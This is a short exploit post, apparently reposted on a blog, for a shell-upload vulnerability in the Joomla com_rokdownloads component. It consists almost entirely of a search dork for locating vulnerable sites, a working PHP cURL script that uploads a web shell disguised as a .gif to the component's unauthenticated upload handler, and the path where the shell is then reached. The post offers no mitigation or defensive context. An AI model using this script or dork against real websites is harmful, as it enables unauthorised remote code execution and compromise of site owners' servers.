oomla Rokdownloads Shell Upload
Quote:#################################
# Exploit Title : joomla com_rokdownloads Components shell upload Vulnerability
# Software Link : http://www.joomla.org
# Security Risk : High
# Tested on : Linux
# Dork : inurl:administrator/components/com_rokdownloads
#################################
Exploit :
Post.php
<?php
$uploadfile="hit.php.gif";
$ch =
curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/images/stories/hit.php.gif
#################################
0 comments:
Post a Comment